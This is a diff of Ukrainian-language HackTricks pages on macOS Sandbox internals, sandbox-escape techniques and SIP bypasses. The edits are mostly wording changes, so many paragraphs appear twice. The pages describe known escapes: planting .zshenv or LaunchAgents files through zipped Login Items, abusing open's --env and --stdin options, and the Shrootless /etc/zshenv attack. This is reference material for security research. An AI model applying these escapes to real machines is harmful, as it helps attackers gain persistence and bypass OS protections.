Деякий код ядра викликав би `priv_check_cred()` з [**bsd/kern/kern_priv.c**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_priv.c) з KAuth обліковими даними процесу та одним з кодів привілеїв, який викликатиме `mac_priv_check`, щоб перевірити, чи будь-яка політика **відмовляє** у наданні привілею, а потім викликає `mac_priv_grant`, щоб перевірити, чи будь-яка політика надає `привілей`.
Деякий код ядра викликатиме `priv_check_cred()` з [**bsd/kern/kern_priv.c**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_priv.c) з KAuth обліковими даними процесу та одним з кодів привілеїв, який викликатиме `mac_priv_check`, щоб перевірити, чи будь-яка політика **відмовляє** у наданні привілею, а потім викликає `mac_priv_grant`, щоб перевірити, чи будь-яка політика надає `привілей`.
### proc_check_syscall_unix

58
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View File

@ -2,22 +2,22 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Основна інформація
## Basic Information
MacOS Sandbox (спочатку називався Seatbelt) **обмежує програми**, що працюють всередині пісочниці, до **дозволених дій, зазначених у профілі Sandbox**, з яким працює програма. Це допомагає забезпечити, що **програма буде отримувати доступ лише до очікуваних ресурсів**.
MacOS Sandbox (спочатку називався Seatbelt) **обмежує програми**, що працюють всередині пісочниці, до **дозволених дій, зазначених у профілі пісочниці**, з яким працює програма. Це допомагає забезпечити, що **програма буде отримувати доступ лише до очікуваних ресурсів**.
Будь-яка програма з **правом** **`com.apple.security.app-sandbox`** буде виконуватися всередині пісочниці. **Бінарні файли Apple** зазвичай виконуються всередині Sandbox, і всі програми з **App Store мають це право**. Тому кілька програм буде виконуватися всередині пісочниці.
Будь-яка програма з **правом** **`com.apple.security.app-sandbox`** буде виконуватися всередині пісочниці. **Бінарні файли Apple** зазвичай виконуються всередині пісочниці, і всі програми з **App Store мають це право**. Тому кілька програм буде виконуватися всередині пісочниці.
Щоб контролювати, що процес може або не може робити, **Sandbox має хуки** практично в будь-якій операції, яку процес може спробувати (включаючи більшість системних викликів) за допомогою **MACF**. Однак, **залежно** від **прав** програми, Sandbox може бути більш лояльним до процесу.
Щоб контролювати, що процес може або не може робити, **пісочниця має хуки** практично в будь-якій операції, яку процес може спробувати (включаючи більшість системних викликів) за допомогою **MACF**. Однак, **залежно** від **прав** програми, пісочниця може бути більш поблажливою до процесу.
Деякі важливі компоненти Sandbox:
Деякі важливі компоненти пісочниці:
- **Розширення ядра** `/System/Library/Extensions/Sandbox.kext`
- **Приватний фреймворк** `/System/Library/PrivateFrameworks/AppSandbox.framework`
- **Демон**, що працює в користувацькому просторі `/usr/libexec/sandboxd`
- **Контейнери** `~/Library/Containers`
- **розширення ядра** `/System/Library/Extensions/Sandbox.kext`
- **приватний фреймворк** `/System/Library/PrivateFrameworks/AppSandbox.framework`
- **демон**, що працює в користувацькому просторі `/usr/libexec/sandboxd`
- **контейнери** `~/Library/Containers`
### Контейнери
### Containers
Кожна програма в пісочниці матиме свій власний контейнер у `~/Library/Containers/{CFBundleIdentifier}` :
```bash
@ -106,11 +106,11 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
> [!WARNING]
> Все, що створюється/модифікується пісочницею, отримає **атрибут карантину**. Це запобігатиме простору пісочниці, активуючи Gatekeeper, якщо пісочна програма намагатиметься виконати щось за допомогою **`open`**.
> Все, що створюється/модифікується пісочницею, отримає **атрибут карантину**. Це запобігатиме простору пісочниці, активуючи Gatekeeper, якщо додаток у пісочниці намагатиметься виконати щось за допомогою **`open`**.
## Профілі пісочниці
Профілі пісочниці - це конфігураційні файли, які вказують, що буде **дозволено/заборонено** в цій **пісочниці**. Вони використовують **Мову профілів пісочниці (SBPL)**, яка базується на [**Scheme**](<https://en.wikipedia.org/wiki/Scheme_(programming_language)>) мові програмування.
Профілі пісочниці - це конфігураційні файли, які вказують, що буде **дозволено/заборонено** в цій **пісочниці**. Вони використовують **Мову профілів пісочниці (SBPL)**, яка базується на мові програмування [**Scheme**](<https://en.wikipedia.org/wiki/Scheme_(programming_language)>).
Ось приклад:
```scheme
@ -139,7 +139,7 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
- **`/usr/share/sandbox`**
- **`/System/Library/Sandbox/Profiles`**
- Інші профілі пісочниці можна перевірити за посиланням [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
- Інші профілі пісочниці можна перевірити за адресою [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
Додатки з **App Store** використовують **профіль** **`/System/Library/Sandbox/Profiles/application.sb`**. Ви можете перевірити в цьому профілі, як права, такі як **`com.apple.security.network.server`**, дозволяють процесу використовувати мережу.
@ -200,7 +200,7 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
{{#endtabs}}
> [!NOTE]
> Зверніть увагу, що **програмне забезпечення**, написане **Apple**, яке працює на **Windows**, **не має додаткових заходів безпеки**, таких як пісочниця для додатків.
> Зверніть увагу, що **програмне забезпечення**, створене **Apple**, яке працює на **Windows**, **не має додаткових заходів безпеки**, таких як пісочниця для додатків.
Приклади обходів:
@ -220,13 +220,13 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
```bash
sandbox-exec -f /tmp/trace.sb /bin/ls
```
У `/tmp/trace.out` ви зможете побачити кожну перевірку пісочниці, яка виконувалася щоразу, коли її викликали (тобто, багато дублікатів).
В `/tmp/trace.out` ви зможете побачити кожну перевірку пісочниці, що виконувалася щоразу, коли її викликали (тобто, багато дублікатів).
Також можливо відстежувати пісочницю, використовуючи параметр **`-t`**: `sandbox-exec -t /path/trace.out -p "(version 1)" /bin/ls`
#### Через API
Функція `sandbox_set_trace_path`, експортована з `libsystem_sandbox.dylib`, дозволяє вказати ім'я файлу трасування, куди будуть записані перевірки пісочниці.\
Функція `sandbox_set_trace_path`, експортована `libsystem_sandbox.dylib`, дозволяє вказати ім'я файлу трасування, куди будуть записані перевірки пісочниці.\
Також можливо зробити щось подібне, викликавши `sandbox_vtrace_enable()` і отримавши журнали помилок з буфера, викликавши `sandbox_vtrace_report()`.
### Інспекція пісочниці
@ -239,7 +239,7 @@ MacOS зберігає системні профілі пісочниці у д
І якщо сторонній додаток має право _**com.apple.security.app-sandbox**_, система застосовує профіль **/System/Library/Sandbox/Profiles/application.sb** до цього процесу.
В iOS за замовчуванням профіль називається **container**, і ми не маємо текстового представлення SBPL. У пам'яті ця пісочниця представлена як бінарне дерево Allow/Deny для кожного дозволу з пісочниці.
В iOS за замовчуванням профіль називається **container** і ми не маємо текстового представлення SBPL. У пам'яті ця пісочниця представлена як бінарне дерево Allow/Deny для кожного дозволу з пісочниці.
### Користувацький SBPL у додатках App Store
@ -253,7 +253,7 @@ MacOS зберігає системні профілі пісочниці у д
(let* ((port (open-input-string string)) (sbpl (read port)))
(with-transparent-redirection (eval sbpl)))))
```
Це **eval рядок після цього права** як профіль Sandbox.
Це **оцінить рядок після цього права** як профіль Sandbox.
### Компіляція та декомпіляція профілю Sandbox
@ -265,9 +265,9 @@ MacOS зберігає системні профілі пісочниці у д
## Налагодження та обхід Sandbox
На macOS, на відміну від iOS, де процеси ізолюються з самого початку ядром, **процеси повинні самостійно вибрати участь у sandbox**. Це означає, що на macOS процес не обмежується sandbox, поки він активно не вирішить увійти в нього, хоча програми з App Store завжди ізольовані.
На macOS, на відміну від iOS, де процеси з самого початку ізольовані ядром, **процеси повинні самостійно вибрати участь у sandbox**. Це означає, що на macOS процес не обмежується sandbox, поки він активно не вирішить увійти в нього, хоча програми з App Store завжди ізольовані.
Процеси автоматично ізолюються з userland, коли вони стартують, якщо у них є право: `com.apple.security.app-sandbox`. Для детального пояснення цього процесу перевірте:
Процеси автоматично ізолюються з userland, коли вони запускаються, якщо у них є право: `com.apple.security.app-sandbox`. Для детального пояснення цього процесу дивіться:
{{#ref}}
macos-sandbox-debug-and-bypass/
@ -294,7 +294,7 @@ macos-sandbox-debug-and-bypass/
### **Перевірка привілеїв PID**
[**Згідно з цим**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), функції **`sandbox_check`** (це `__mac_syscall`), можуть перевірити **чи дозволена операція чи ні** sandbox у певному PID, аудиторському токені або унікальному ID.
[**Згідно з цим**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), функції **`sandbox_check`** (це `__mac_syscall`), можуть перевірити **чи дозволена операція чи ні** sandbox у певному PID, токені аудиту або унікальному ID.
[**Інструмент sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c) (знайдіть його [скомпільованим тут](https://newosxbook.com/articles/hitsb.html)) може перевірити, чи може PID виконати певні дії:
```bash
@ -315,7 +315,7 @@ sbtool <pid> all
## mac_syscall
Цей системний виклик (#381) очікує один рядок як перший аргумент, який вказуватиме модуль для виконання, а потім код у другому аргументі, який вказуватиме функцію для виконання. Третій аргумент залежатиме від виконуваної функції.
Цей системний виклик (#381) очікує один рядковий аргумент, який вказує модуль для виконання, а потім код у другому аргументі, який вказує функцію для виконання. Третій аргумент залежатиме від виконуваної функції.
Виклик функції `___sandbox_ms` обгортає `mac_syscall`, вказуючи в першому аргументі `"Sandbox"`, так само як `___sandbox_msp` є обгорткою для `mac_set_proc` (#387). Деякі з підтримуваних кодів `___sandbox_ms` можна знайти в цій таблиці:
@ -340,12 +340,12 @@ sbtool <pid> all
- **vtrace (#19)**: Відстежувати операції пісочниці для моніторингу або налагодження.
- **builtin_profile_deactivate (#20)**: (macOS < 11) Деактивувати іменовані профілі (наприклад, `pe_i_can_has_debugger`).
- **check_bulk (#21)**: Виконати кілька операцій `sandbox_check` в одному виклику.
- **reference_retain_by_audit_token (#28)**: Створити посилання для токена аудиту для використання в перевірках пісочниці.
- **reference_release (#29)**: Вивільнити раніше збережене посилання на токен аудиту.
- **reference_retain_by_audit_token (#28)**: Створити посилання для аудиторського токена для використання в перевірках пісочниці.
- **reference_release (#29)**: Вивільнити раніше збережене посилання на аудиторський токен.
- **rootless_allows_task_for_pid (#30)**: Перевірити, чи дозволено `task_for_pid` (схоже на перевірки `csr`).
- **rootless_whitelist_push (#31)**: (macOS) Застосувати файл маніфесту системної цілісності (SIP).
- **rootless_whitelist_check (preflight) (#32)**: Перевірити файл маніфесту SIP перед виконанням.
- **rootless_protected_volume (#33)**: (macOS) Застосувати SIP-захисти до диска або розділу.
- **rootless_protected_volume (#33)**: (macOS) Застосувати SIP-захист до диска або розділу.
- **rootless_mkdir_protected (#34)**: Застосувати SIP/DataVault захист до процесу створення каталогу.
## Sandbox.kext
@ -354,19 +354,19 @@ sbtool <pid> all
- **`hook_policy_init`**: Він підключає `mpo_policy_init` і викликається після `mac_policy_register`. Він виконує більшість ініціалізацій пісочниці. Він також ініціалізує SIP.
- **`hook_policy_initbsd`**: Налаштовує інтерфейс sysctl, реєструючи `security.mac.sandbox.sentinel`, `security.mac.sandbox.audio_active` та `security.mac.sandbox.debug_mode` (якщо завантажено з `PE_i_can_has_debugger`).
- **`hook_policy_syscall`**: Викликається `mac_syscall` з "Sandbox" як перший аргумент і кодом, що вказує на операцію, у другому. Використовується оператор switch для знаходження коду для виконання відповідно до запитуваного коду.
- **`hook_policy_syscall`**: Викликається `mac_syscall` з "Sandbox" як першим аргументом і кодом, що вказує операцію, у другому. Використовується оператор switch для знаходження коду для виконання відповідно до запитуваного коду.
### MACF Hooks
**`Sandbox.kext`** використовує більше ста хуків через MACF. Більшість хуків просто перевіряють деякі тривіальні випадки, які дозволяють виконати дію, якщо ні, вони викликають **`cred_sb_evalutate`** з **обліковими даними** з MACF та номером, що відповідає **операції**, яку потрібно виконати, і **буфером** для виходу.
Добрим прикладом цього є функція **`_mpo_file_check_mmap`**, яка підключає **`mmap`** і яка почне перевіряти, чи буде нова пам'ять записуваною (і якщо ні, дозволить виконання), потім перевірить, чи використовується вона для спільного кешу dyld, і якщо так, дозволить виконання, а в кінці викличе **`sb_evaluate_internal`** (або одну з його обгорток) для виконання подальших перевірок дозволу.
Добрим прикладом цього є функція **`_mpo_file_check_mmap`**, яка підключає **`mmap`** і яка почне перевіряти, чи буде нова пам'ять записуваною (і якщо ні, дозволить виконання), потім перевірить, чи використовується вона для спільного кешу dyld, і якщо так, дозволить виконання, а нарешті викличе **`sb_evaluate_internal`** (або одну з його обгорток) для виконання подальших перевірок дозволу.
Більше того, з сотень хуків, які використовує пісочниця, є 3, які особливо цікаві:
- `mpo_proc_check_for`: Застосовує профіль, якщо це необхідно, і якщо він не був раніше застосований.
- `mpo_vnode_check_exec`: Викликається, коли процес завантажує асоційований бінарний файл, тоді виконується перевірка профілю, а також перевірка, що забороняє виконання SUID/SGID.
- `mpo_cred_label_update_execve`: Це викликається, коли призначається мітка. Це найдовший, оскільки викликається, коли бінарний файл повністю завантажений, але ще не виконаний. Він виконує такі дії, як створення об'єкта пісочниці, прикріплення структури пісочниці до облікових даних kauth, видалення доступу до mach портів...
- `mpo_vnode_check_exec`: Викликається, коли процес завантажує асоційований бінарний файл, потім виконується перевірка профілю, а також перевірка, що забороняє виконання SUID/SGID.
- `mpo_cred_label_update_execve`: Це викликається, коли призначається мітка. Це найдовший з них, оскільки викликається, коли бінарний файл повністю завантажений, але ще не виконаний. Він виконає такі дії, як створення об'єкта пісочниці, прикріплення структури пісочниці до облікових даних kauth, видалення доступу до mach-портів...
Зверніть увагу, що **`_cred_sb_evalutate`** є обгорткою над **`sb_evaluate_internal`**, і ця функція отримує передані облікові дані, а потім виконує оцінку, використовуючи функцію **`eval`**, яка зазвичай оцінює **профіль платформи**, який за замовчуванням застосовується до всіх процесів, а потім **специфічний профіль процесу**. Зверніть увагу, що профіль платформи є одним з основних компонентів **SIP** в macOS.

16
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
View File

@ -24,7 +24,7 @@
> [!CAUTION]
> Отже, на даний момент, якщо ви просто здатні створити папку з назвою, що закінчується на **`.app`** без атрибута карантину, ви можете втекти з пісочниці, оскільки macOS лише **перевіряє** атрибут **карантину** в **папці `.app`** та в **основному виконуваному файлі** (і ми вкажемо основний виконуваний файл на **`/bin/bash`**).
>
> Зверніть увагу, що якщо пакет .app вже був авторизований для запуску (він має атрибут карантину з прапором авторизації на запуск), ви також можете зловживати ним... за винятком того, що тепер ви не можете записувати всередині **пакетів .app**, якщо у вас немає деяких привілейованих дозволів TCC (яких у вас не буде всередині пісочниці).
> Зверніть увагу, що якщо пакет .app вже був авторизований для запуску (він має атрибут карантину з прапором авторизації на запуск), ви також можете зловживати ним... за винятком того, що тепер ви не можете записувати всередині пакетів **`.app`**, якщо у вас немає деяких привілейованих дозволів TCC (яких у вас не буде всередині пісочниці).
### Зловживання функціональністю Open
@ -63,9 +63,9 @@ macos-office-sandbox-bypasses.md
Пісочниця також дозволяє спілкуватися з певними **службами Mach** через XPC, визначеними в профілі `application.sb`. Якщо вам вдасться **зловживати** однією з цих служб, ви можете бути в змозі **втекти з пісочниці**.
Як зазначено в [цьому звіті](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), інформація про служби Mach зберігається в `/System/Library/xpc/launchd.plist`. Можливо знайти всі системні та користувацькі служби Mach, шукаючи в цьому файлі `<string>System</string>` та `<string>User</string>`.
Як зазначено в [цьому звіті](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), інформація про служби Mach зберігається в `/System/Library/xpc/launchd.plist`. Можна знайти всі системні та користувацькі служби Mach, шукаючи в цьому файлі `<string>System</string>` та `<string>User</string>`.
Більше того, можливо перевірити, чи доступна служба Mach для пісочної програми, викликавши `bootstrap_look_up`:
Більше того, можна перевірити, чи доступна служба Mach для пісочної програми, викликавши `bootstrap_look_up`:
```objectivec
void checkService(const char *serviceName) {
mach_port_t service_port = MACH_PORT_NULL;
@ -90,13 +90,13 @@ checkService(serviceName.UTF8String);
```
### Доступні PID Mach сервіси
Ці Mach сервіси спочатку були зловжиті для [виходу з пісочниці в цьому звіті](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/). На той час **всі XPC сервіси, які вимагалися** додатком та його фреймворком, були видимі в домені PID додатка (це Mach сервіси з `ServiceType` як `Application`).
Ці Mach сервіси спочатку були зловживані для [виходу з пісочниці в цьому звіті](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/). На той час **всі XPC сервіси, які вимагалися** додатком та його фреймворком, були видимі в домені PID додатка (це Mach сервіси з `ServiceType` як `Application`).
Щоб **зв'язатися з XPC сервісом домену PID**, потрібно просто зареєструвати його всередині додатка з рядком, таким як:
Щоб **зв'язатися з XPC сервісом домену PID**, потрібно просто зареєструвати його всередині додатка за допомогою рядка, такого як:
```objectivec
[[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework"]load];
```
Крім того, можна знайти всі **Application** Mach сервіси, шукаючи в `System/Library/xpc/launchd.plist` за `<string>Application</string>`.
Крім того, можна знайти всі **Application** Mach сервіси, шукаючи в `System/Library/xpc/launchd.plist` `<string>Application</string>`.
Інший спосіб знайти дійсні xpc сервіси - перевірити ті, що знаходяться в:
```bash
@ -236,7 +236,7 @@ open /tmp/poc.app
### Права
Зверніть увагу, що навіть якщо деякі **дії** можуть бути **дозволені пісочницею**, якщо додаток має конкретне **право**, як у:
Зверніть увагу, що навіть якщо деякі **дії** можуть бути **дозволені пісочницею**, якщо у програми є конкретне **право**, як у:
```scheme
(when (entitlement "com.apple.security.network.client")
(allow network-outbound (remote ip))
@ -254,7 +254,7 @@ open /tmp/poc.app
../../../macos-proces-abuse/macos-function-hooking.md
{{#endref}}
#### Інтерпост `_libsecinit_initializer`, щоб запобігти пісочниці
#### Interpost `_libsecinit_initializer`, щоб запобігти пісочниці
```c
// gcc -dynamiclib interpose.c -o interpose.dylib

12
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
View File

@ -16,7 +16,7 @@
Було виявлено, що зсередини пісочниці можливо створити **Login Item** (додатки, які виконуються під час входу користувача). Однак ці додатки **не виконуватимуться, якщо** вони **не сертифіковані** і **неможливо додати аргументи** (тому ви не можете просто запустити зворотний шелл, використовуючи **`bash`**).
З попереднього обходу пісочниці Microsoft вимкнув можливість записувати файли в `~/Library/LaunchAgents`. Однак було виявлено, що якщо ви помістите **zip-файл як Login Item**, `Archive Utility` просто **розпакує** його в його поточному місці. Тому, оскільки за замовчуванням папка `LaunchAgents` з `~/Library` не створюється, було можливо **запакувати plist у `LaunchAgents/~$escape.plist`** і **помістити** zip-файл у **`~/Library`**, щоб при розпакуванні він досягнув місця збереження.
Після попереднього обходу пісочниці Microsoft вимкнув можливість записувати файли в `~/Library/LaunchAgents`. Однак було виявлено, що якщо ви помістите **zip-файл як Login Item**, `Archive Utility` просто **розпакує** його в його поточному місці. Тому, оскільки за замовчуванням папка `LaunchAgents` з `~/Library` не створюється, було можливим **запакувати plist у `LaunchAgents/~$escape.plist`** і **помістити** zip-файл у **`~/Library`**, щоб при розпакуванні він досягнув місця збереження.
Перевірте [**оригінальний звіт тут**](https://objective-see.org/blog/blog_0x4B.html).
@ -24,11 +24,11 @@
(Пам'ятайте, що з першої втечі Word може записувати довільні файли, ім'я яких починається з `~$`).
Однак у попередньої техніки була обмеження: якщо папка **`~/Library/LaunchAgents`** існує, тому що інше програмне забезпечення її створило, це призведе до збою. Тому для цього було виявлено інший ланцюг Login Items.
Однак у попередньої техніки була обмеження: якщо папка **`~/Library/LaunchAgents`** існує, тому що інше програмне забезпечення створило її, це призведе до збою. Тому для цього було виявлено інший ланцюг Login Items.
Зловмисник міг створити файли **`.bash_profile`** і **`.zshenv`** з корисним навантаженням для виконання, а потім запакувати їх і **записати zip у папку користувача жертви**: **`~/~$escape.zip`**.
Потім додайте zip-файл до **Login Items** і потім до програми **`Terminal`**. Коли користувач повторно входить, zip-файл буде розпакований у файлі користувача, перезаписуючи **`.bash_profile`** і **`.zshenv`**, і, отже, термінал виконає один з цих файлів (в залежності від того, чи використовується bash або zsh).
Потім додайте zip-файл до **Login Items** і потім до **додатку Terminal**. Коли користувач повторно входить, zip-файл буде розпакований у файлі користувача, перезаписуючи **`.bash_profile`** і **`.zshenv`**, і, отже, термінал виконає один з цих файлів (в залежності від того, чи використовується bash або zsh).
Перевірте [**оригінальний звіт тут**](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c).
@ -36,7 +36,7 @@
З пісочниць все ще можливо викликати інші процеси, використовуючи утиліту **`open`**. Більше того, ці процеси будуть виконуватися **в межах своєї власної пісочниці**.
Було виявлено, що утиліта open має опцію **`--env`** для запуску програми з **конкретними змінними середовища**. Отже, було можливо створити **файл `.zshenv`** у папці **всередині** **пісочниці** і використовувати `open` з `--env`, встановлюючи **змінну `HOME`** на цю папку, відкриваючи цю програму `Terminal`, яка виконає файл `.zshenv` (з якоїсь причини також було потрібно встановити змінну `__OSINSTALL_ENVIROMENT`).
Було виявлено, що утиліта open має опцію **`--env`** для запуску програми з **конкретними змінними середовища**. Отже, було можливим створити **файл `.zshenv`** у папці **всередині** **пісочниці** і використовувати `open` з `--env`, встановлюючи **змінну `HOME`** на цю папку, відкриваючи додаток `Terminal`, який виконає файл `.zshenv` (з якоїсь причини також потрібно було встановити змінну `__OSINSTALL_ENVIROMENT`).
Перевірте [**оригінальний звіт тут**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
@ -44,9 +44,9 @@
Утиліта **`open`** також підтримувала параметр **`--stdin`** (і після попереднього обходу більше не було можливості використовувати `--env`).
Суть у тому, що навіть якщо **`python`** був підписаний Apple, він **не виконає** скрипт з атрибутом **`quarantine`**. Однак було можливо передати йому скрипт з stdin, тому він не перевірить, чи був він під карантином чи ні:&#x20;
Суть у тому, що навіть якщо **`python`** був підписаний Apple, він **не виконає** скрипт з атрибутом **`quarantine`**. Однак було можливим передати йому скрипт з stdin, тому він не перевірить, чи був він під карантином чи ні:&#x20;
1. Скиньте файл **`~$exploit.py`** з довільними командами Python.
2. Запустіть _open_ **`stdin='~$exploit.py' -a Python`**, що запускає програму Python з нашим скинутим файлом, який служить її стандартним введенням. Python із задоволенням виконує наш код, і оскільки це дочірній процес _launchd_, він не підпорядковується правилам пісочниці Word.
2. Запустіть _open_ **`stdin='~$exploit.py' -a Python`**, що запускає додаток Python з нашим скинутим файлом, який служить його стандартним введенням. Python із задоволенням виконує наш код, і оскільки це дочірній процес _launchd_, він не підпадає під правила пісочниці Word.
{{#include ../../../../../banners/hacktricks-training.md}}

50
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View File

@ -20,7 +20,7 @@
* /usr/local
* /usr/share/man
```
Цей фрагмент вказує на те, що хоча SIP зазвичай захищає директорію **`/usr`**, є специфічні підкаталоги (`/usr/libexec/cups`, `/usr/local` та `/usr/share/man`), де зміни дозволені, як вказано зірочкою (\*) перед їх шляхами.
Цей фрагмент вказує на те, що хоча SIP зазвичай захищає директорію **`/usr`**, є специфічні підкаталоги (`/usr/libexec/cups`, `/usr/local` та `/usr/share/man`), де зміни дозволені, як вказано зірочкою (\*) перед їхніми шляхами.
Щоб перевірити, чи директорія або файл захищені SIP, ви можете використовувати команду **`ls -lOd`**, щоб перевірити наявність прапора **`restricted`** або **`sunlnk`**. Наприклад:
```bash
@ -48,7 +48,7 @@ drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
- Зміна змінних NVRAM
- Дозвіл на налагодження ядра
Опції зберігаються у змінній nvram як бітовий прапорець (`csr-active-config` на Intel і `lp-sip0` читається з завантаженого Device Tree для ARM). Ви можете знайти прапорці в вихідному коді XNU у `csr.sh`:
Опції зберігаються в змінній nvram як бітовий прапорець (`csr-active-config` на Intel і `lp-sip0` читається з завантаженого Device Tree для ARM). Ви можете знайти прапорці в вихідному коді XNU в `csr.sh`:
<figure><img src="../../../images/image (1192).png" alt=""><figcaption></figcaption></figure>
@ -94,16 +94,16 @@ csrutil enable --without debug
- **Доступ до даних користувача**: Читати чутливі дані користувача, такі як електронна пошта, повідомлення та історія Safari з усіх облікових записів користувачів.
- **Обхід TCC**: Прямо маніпулювати базою даних TCC (Прозорість, Згода та Контроль), щоб надати несанкціонований доступ до веб-камери, мікрофона та інших ресурсів.
- **Встановити постійність**: Розмістити шкідливе ПЗ в захищених SIP місцях, роблячи його стійким до видалення, навіть з правами root. Це також включає можливість підробки Інструменту видалення шкідливого ПЗ (MRT).
- **Встановити постійність**: Розмістити шкідливе ПЗ в захищених SIP місцях, роблячи його стійким до видалення, навіть з правами root. Це також включає можливість втручання в Інструмент видалення шкідливого ПЗ (MRT).
- **Завантажувати розширення ядра**: Хоча є додаткові запобіжники, обхід SIP спрощує процес завантаження непідписаних розширень ядра.
### Пакети установників
### Пакети установника
**Пакети установників, підписані сертифікатом Apple**, можуть обійти його захист. Це означає, що навіть пакети, підписані стандартними розробниками, будуть заблоковані, якщо вони намагатимуться змінити каталоги, захищені SIP.
**Пакети установника, підписані сертифікатом Apple**, можуть обійти його захист. Це означає, що навіть пакети, підписані стандартними розробниками, будуть заблоковані, якщо вони намагатимуться змінити каталоги, захищені SIP.
### Невідомий файл SIP
Однією з потенційних лазівок є те, що якщо файл вказано в **`rootless.conf`, але наразі не існує**, його можна створити. Шкідливе ПЗ може скористатися цим, щоб **встановити постійність** в системі. Наприклад, шкідлива програма може створити файл .plist у `/System/Library/LaunchDaemons`, якщо він вказаний у `rootless.conf`, але не присутній.
Однією з потенційних лазівок є те, що якщо файл вказано в **`rootless.conf`, але він наразі не існує**, його можна створити. Шкідливе ПЗ може скористатися цим, щоб **встановити постійність** в системі. Наприклад, шкідлива програма може створити файл .plist у `/System/Library/LaunchDaemons`, якщо він вказаний у `rootless.conf`, але не присутній.
### com.apple.rootless.install.heritable
@ -116,25 +116,25 @@ csrutil enable --without debug
#### [CVE-20209854](https://objective-see.org/blog/blog_0x4D.html) <a href="#cve-unauthd-chain" id="cve-unauthd-chain"></a>
Якщо пакет було встановлено з змонтованого образу або зовнішнього диска, **установник** **виконував** двійковий файл з **цієї файлової системи** (замість захищеного місця SIP), змушуючи **`system_installd`** виконувати довільний двійковий файл.
Якщо пакет було встановлено з підключеного образу або зовнішнього диска, **установник** **виконував** двійковий файл з **цієї файлової системи** (замість захищеного місця SIP), змушуючи **`system_installd`** виконувати довільний двійковий файл.
#### CVE-2021-30892 - Shrootless
[**Дослідники з цього блогу**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) виявили вразливість у механізмі захисту цілісності системи macOS (SIP), названу вразливістю 'Shrootless'. Ця вразливість зосереджена навколо демона **`system_installd`**, який має право **`com.apple.rootless.install.heritable`**, що дозволяє будь-якому з його дочірніх процесів обійти обмеження файлової системи SIP.
[**Дослідники з цього блогу**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) виявили вразливість у механізмі захисту цілісності системи (SIP) macOS, відому як вразливість 'Shrootless'. Ця вразливість зосереджена навколо демона **`system_installd`**, який має право **`com.apple.rootless.install.heritable`**, що дозволяє будь-якому з його дочірніх процесів обійти обмеження файлової системи SIP.
Демон **`system_installd`** буде встановлювати пакети, які були підписані **Apple**.
Дослідники виявили, що під час установки пакета, підписаного Apple (.pkg файл), **`system_installd`** **виконує** будь-які **скрипти після установки**, включені в пакет. Ці скрипти виконуються за допомогою стандартної оболонки, **`zsh`**, яка автоматично **виконує** команди з файлу **`/etc/zshenv`**, якщо він існує, навіть у неінтерактивному режимі. Цю поведінку можна використовувати зловмисниками: створивши шкідливий файл `/etc/zshenv` і чекаючи, поки **`system_installd` викличе `zsh`**, вони можуть виконувати довільні операції на пристрої.
Дослідники виявили, що під час установки пакета, підписаного Apple (.pkg файл), **`system_installd`** **виконує** будь-які **скрипти після установки**, включені в пакет. Ці скрипти виконуються за допомогою стандартної оболонки, **`zsh`**, яка автоматично **виконує** команди з файлу **`/etc/zshenv`**, якщо він існує, навіть у неінтерактивному режимі. Цю поведінку можна використати зловмисниками: створивши шкідливий файл `/etc/zshenv` і чекаючи, поки **`system_installd` викличе `zsh`**, вони можуть виконувати довільні операції на пристрої.
Більше того, було виявлено, що **`/etc/zshenv` може використовуватися як загальна техніка атаки**, не лише для обходу SIP. Кожен профіль користувача має файл `~/.zshenv`, який поводиться так само, як `/etc/zshenv`, але не вимагає прав root. Цей файл може використовуватися як механізм постійності, спрацьовуючи щоразу, коли запускається `zsh`, або як механізм підвищення привілеїв. Якщо адміністратор підвищує привілеї до root, використовуючи `sudo -s` або `sudo <command>`, файл `~/.zshenv` буде спрацьовувати, ефективно підвищуючи привілеї до root.
Більше того, було виявлено, що **`/etc/zshenv` може використовуватися як загальна техніка атаки**, а не лише для обходу SIP. Кожен профіль користувача має файл `~/.zshenv`, який поводиться так само, як `/etc/zshenv`, але не вимагає прав root. Цей файл може використовуватися як механізм постійності, спрацьовуючи щоразу, коли запускається `zsh`, або як механізм підвищення привілеїв. Якщо адміністратор підвищує привілеї до root, використовуючи `sudo -s` або `sudo <command>`, файл `~/.zshenv` буде спрацьовувати, ефективно підвищуючи привілеї до root.
#### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)
